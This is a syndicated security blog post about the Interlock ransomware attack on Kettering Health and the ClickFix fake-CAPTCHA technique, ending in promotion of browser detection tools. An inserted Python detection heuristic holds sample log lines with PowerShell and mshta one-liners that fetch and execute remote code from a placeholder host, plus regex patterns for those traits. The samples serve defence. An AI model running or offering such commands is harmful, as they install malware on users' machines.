Interlock and the Kettering Ransomware Attack: ClickFix’s Persistence

Healthcare worker in purple scrubs with a stethoscope is looking at a computer, with a red ghost-like figure behind her. Browser screen is super-imposed and shows that she is being attacked.

In healthcare, every minute of downtime isn’t just a technical problem — it’s a patient safety risk.

CNN recently reported that Kettering Health, a major hospital network in Ohio, was hit by a ransomware attack. According to CNN, the Interlock ransomware group claimed responsibility, sending a chilling reminder that healthcare remains a prime target for this particular ransomware gang.

While technical details of the Kettering attack remain scarce, Interlock’s recent history — and the emergence of browser-based attack chains like ClickFix — should put every CISO on high alert. In fact, HHS released a sector-level alert on ClickFix because of the severity of the technique and how focused attackers were on targeting healthcare organizations. Though it is not yet confirmed that this specific technique was used at Kettering, Interlock has been linked to ClickFix attacks elsewhere.

While Kettering continues to focus on incident response, for those watching across the industry, what’s clear is the growing role of browser-based attacks in ransomware campaigns, and how, in healthcare environments, these kinds of attacks can be life-threatening.

Healthcare Remains a Top Target

Ransomware actors continue to prioritize healthcare organizations as targets because of the high value placed on continuity of care. Timely access to records, imaging, and communication systems is essential for delivering treatment — so when those systems are disrupted, the operational impact is immediate.

Healthcare organizations are uniquely vulnerable to ransomware for several reasons:

  • Dispersed and unmanaged endpoints: Clinicians often use shared workstations, personal laptops, and mobile devices, increasing attack surface.
  • High uptime requirements: Any downtime can delay surgeries, diagnostics, or emergency care — forcing quick, sometimes quiet, ransom payments.
  • Regulatory pressure: Standards and requirements like HIPAA and HITRUST turn data breaches and outages into costly, reportable incidents.
  • High ROI for attackers: Medical data and patient information continue to be the most valuable information sold on the dark web.

The stakes are high: In 2024, 67% of healthcare organizations reported a ransomware attack, and research shows that patient care delays increase measurably during major incidents.

Recent examples of healthcare organizations disrupted because of a cyberattack include:

  • Change Healthcare (2024): Payment processor attack rippled across the U.S., delaying claims and payments for weeks.
  • CommonSpirit Health (2022): 600,000+ patient records exposed, care delayed, millions in costs.
  • Universal Health Services (2020): 250 facilities offline, staff forced to revert to paper, patient care disrupted.

As more clinical and operational workflows move into SaaS apps and browser-delivered interfaces, the browser itself is becoming more relevant to healthcare security.

Understanding ClickFix and Browser-Based Tactics

ClickFix is a technique that relies on seemingly legitimate browser interactions — like fake CAPTCHAs or pop-up prompts — to trick users into activating malicious scripts. What makes this approach difficult to detect is that it relies heavily on the browser for clipboard manipulation, with no file download to trigger traditional file-based alerts or network signatures.

Here’s how a ClickFix attack could unfold in a healthcare organization:

  1. A healthcare worker visits a compromised website or clicks a phishing link.
  2. A fake browser prompt appears (e.g., “Please complete this CAPTCHA to continue”).
  3. The user is tricked into copying and running a script (often a PowerShell command), which silently installs malware — sometimes without any download or obvious warning.
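A defender-side heuristic for the chain above, added here as an example that is not SquareX’s code or from the original post: it scans constructed process-creation events for a script interpreter launched from the interactive shell (assumed to be explorer.exe, as when a user pastes a copied command into the Run dialog) whose command line carries download, in-memory-execution or obfuscation indicators. The log format, field names, parent/interpreter lists and indicator patterns are all assumptions for illustration.

```python
"""Heuristic ClickFix-style detection over process-creation events.
Added illustration only; log format and field names are assumed."""
import re
from typing import Dict, List

# Constructed sample events (key=value, one per line); assumed format.
SAMPLE_LOG = """\
ts=2025-05-20T10:01:02Z host=WS-NURSE-07 parent=explorer.exe image=powershell.exe cmd="powershell -w hidden -c iex (iwr http://example.invalid/verify).Content"
ts=2025-05-20T10:02:10Z host=WS-NURSE-07 parent=explorer.exe image=notepad.exe cmd="notepad.exe"
ts=2025-05-20T10:03:44Z host=WS-ADMIN-02 parent=explorer.exe image=mshta.exe cmd="mshta https://example.invalid/captcha"
ts=2025-05-20T10:05:00Z host=WS-IT-01 parent=code.exe image=powershell.exe cmd="powershell -File build.ps1"
ts=2025-05-20T10:06:30Z host=WS-RECEP-03 parent=explorer.exe image=powershell.exe cmd="powershell -ep bypass -enc QUJDREVG"
"""

# Assumption: a user pasting into the Run dialog yields explorer.exe as parent.
INTERACTIVE_PARENTS = {"explorer.exe"}
# Interpreters a copied one-liner is typically run through (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
# Command-line traits of a paste-and-run payload; each is a named indicator.
INDICATORS = {
    "remote-fetch": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b|https?://", re.I),
    "in-memory-exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded-cmd": re.compile(r"-e(nc|ncodedcommand)\b", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy-bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
}


def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value line; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}


def flag_clickfix(log_text: str) -> List[Dict[str, object]]:
    """Return events where an interactive launch of an interpreter carries
    at least one indicator, with the indicator names that matched."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if not ev or ev.get("parent", "").lower() not in INTERACTIVE_PARENTS:
            continue
        if ev.get("image", "").lower() not in INTERPRETERS:
            continue
        matched = [name for name, rx in INDICATORS.items() if rx.search(ev.get("cmd", ""))]
        if matched:
            hits.append({"host": ev.get("host", "?"), "image": ev["image"], "indicators": matched})
    return hits


if __name__ == "__main__":
    for hit in flag_clickfix(SAMPLE_LOG):
        print(hit)
```

Tune the parent and interpreter lists to your telemetry source, and allowlist hosts where administrators legitimately run interactive PowerShell.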

SquareX first detailed this technique in 2024 to illustrate a broader challenge: many endpoint and network tools lack visibility into what happens in the browser — including browser extensions, clipboard activity, and in-browser scripting.

🧠 Read our full analysis, with step-by-step details, of the ClickFix attack →

Why Traditional Security Tools Miss Browser Attacks

Most healthcare organizations rely on a familiar stack: Secure Web Gateways (SWG), Endpoint Detection & Response (EDR), and Data Loss Prevention (DLP). But these tools were not designed for the complexity of modern browsers.

What they miss:

  • DOM-level changes (malicious form injections or script manipulations)
  • Malicious browser extensions (often installed by non-technical staff)
  • Clipboard hijacking (stealing credentials or session tokens)
  • Client-side file and data reassembly (a malicious file broken into parts to evade detection and reassembled into the full payload once all pieces have been downloaded)
  • WASM-based payloads (running near-native code inside the browser)

Meanwhile, many clinical workflows — from EHRs to claims portals — now run in the browser. In fact, a 2024 survey of the healthcare technology market showed the healthcare SaaS market expected to grow nearly 20% by 2028.

This is where Browser Detection & Response (BDR) can complement existing investments — by providing client-side visibility into user behavior and web application interactions that traditional controls can’t see.

Practical Next Steps for Healthcare Security Teams

This is a good moment to reassess browser-layer visibility and controls. Here are some actions that security teams can take today:

  1. Audit browser extension policies and usage, especially for unmanaged or personal devices accessing hospital systems.
  2. Review recent phishing incidents for browser-based interaction patterns — such as prompts, redirects, or spoofed logins.
  3. Test your existing tools against modern client-side attack scenarios. Tools like SquareX’s Web Security Posture Assessment offer a free analysis of your current risk based on real-world threats.
  4. Explore BDR solutions that can provide visibility into browser events, prevent data leakage, and enrich threat investigations — without disrupting clinical workflows.

Final Thoughts

The Kettering Health ransomware incident is yet another reminder of how persistent and creative today’s adversaries have become. While we don’t yet know exactly how the breach occurred, the involvement of a group known to use browser-based techniques raises thoughtful questions for defenders.

Rather than respond with alarm, this is an opportunity to ask:

Do we have the visibility we need at the browser layer?

Are we prepared to detect and respond to client-side threats that bypass legacy controls?

If your answer is no, that’s okay. Modernizing browser security doesn’t require a full overhaul — you may just need to layer in the right visibility where today’s users and workflows operate. Learn more in this Browser Detection and Response white paper.

*** This is a Security Bloggers Network syndicated blog from SquareX Labs - Medium authored by Mary Yang. Read the original post at: https://labs.sqrx.com/interlock-and-the-kettering-ransomware-attack-clickfixs-persistence-ee00aaf67bff?source=rss----f5a55541436d---4